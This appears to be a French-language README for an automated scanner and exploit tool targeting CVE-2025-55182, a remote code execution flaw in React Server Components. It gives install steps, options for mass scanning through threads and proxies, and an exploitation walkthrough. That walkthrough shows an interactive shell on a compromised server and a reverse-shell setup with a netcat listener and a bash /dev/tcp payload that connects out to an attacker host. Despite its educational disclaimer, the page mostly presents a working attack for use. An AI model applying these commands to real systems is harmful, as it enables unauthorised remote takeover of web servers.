
Scanner de vulnérabilité RCE critique pour React Server Components (CVE-2025-55182). Framework d'exploitation automatisé avec prise en charge multi-payload, capacités de proxy et exécution interactive de commandes.
[!Warning] Ce dépôt est destiné uniquement à des fins éducatives et de recherche.
- Utilisez les PoCs fournis exclusivement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de tester.
- L'accès non autorisé, l'exploitation ou l'utilisation abusive de tout matériel dans ce dépôt est illégal.
- L'(es) auteur(s) n'assume(nt) aucune responsabilité pour tout dommage, utilisation abusive ou conséquences juridiques résultant d'une utilisation inappropriée.
CVE-2025-55182 est une vulnérabilité critique d'exécution de code à distance affectant les versions 19.0.0, 19.1.0, 19.1.1 et 19.2.0 de React Server Components. Cette vulnérabilité provient d'une désérialisation non sécurisée des charges utiles des requêtes HTTP vers les points de terminaison des fonctions serveur, permettant à des attaquants non authentifiés d'exécuter du code arbitraire à distance.
CVE ID : CVE-2025-55182
Versions affectées :
git clone https://github.com/AliHzSec/CVE-2025-55182.git
cd CVE-2025-55182
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
python3 main.py [-h] (-d | -e) [-u URL] [-l LIST] [-p PROXY | -pl PROXY_LIST] [-t THREADS] [-s]
| Argument | Description |
|---|---|
-d, --detection | Mode détection (recherche de vulnérabilités) |
-e, --exploit | Mode exploitation (exploiter une cible unique) |
-u, --url URL | URL cible unique à analyser/exploiter |
-l, --list FILE | Fichier contenant une liste d'URL cibles (mode détection uniquement) |
-p, --proxy URL | URL proxy unique (ex. http://127.0.0.1:8080) |
-pl, --proxy-list FILE | Fichier contenant une liste d'URL proxy (une par ligne) |
-t, --threads N | Nombre de threads concurrents (défaut : 10, mode détection uniquement) |
-s, --silent | Mode silencieux - n'affiche que les cibles vulnérables (mode détection uniquement) |
-o, --output [FILE] | Enregistrer les cibles vulnérables dans un fichier (mode détection uniquement). Si aucun nom de fichier n'est fourni, utilise par défaut : CVE-2025-55182_Result_YYYYMMDD_HHMMSS.txt |
--debug | Activer les logs de débogage - affiche les détails des réponses et les tentatives de nouvelle tentative (non disponible en mode silencieux) |
python3 main.py -d -u https://example.com
python3 main.py -d -l targets.txt
python3 main.py -d -l targets.txt -p http://127.0.0.1:8080
python3 main.py -d -l targets.txt -s
python3 main.py -d -l targets.txt -t 20
python3 main.py -e -u https://vulnerable-site.com
Sélectionnez ensuite [i] pour le shell interactif :
Choose exploitation method:
[i] Interactive shell
[r] Reverse shell
Enter your choice (i/r): i
shell> whoami
ec2-user
shell> id
uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user)
shell> ls -la
total 48
drwxrwxr-x 5 user user 4096 Dec 7 10:00 .
drwxr-xr-x 3 root root 4096 Dec 1 08:00 ...
...
shell> exit
python3 main.py -e -u https://vulnerable-site.com
Sélectionnez ensuite [r] pour le shell inverse et choisissez le type de charge utile :
Choose exploitation method:
[i] Interactive shell
[r] Reverse shell
Enter your choice (i/r): r
Choose payload option:
[d] Use default payloads (Try multiple reverse shells)
[c] Provide custom payload
Enter your choice (d/c): d
Enter your IP and port in this format:
Example: 192.168.1.100:4444
IP:PORT> 192.168.1.100:4444
Setup your listener with this command:
nc -lvnp 4444
Press ENTER when your listener is ready...
L'outil essaiera automatiquement plus de 17 charges utiles de shell inverse différentes jusqu'à ce que l'une d'elles réussisse.
Enter your choice (d/c): c
Enter your custom reverse shell payload:
payload> bash -i >& /dev/tcp/10.0.0.1/4444 0>&1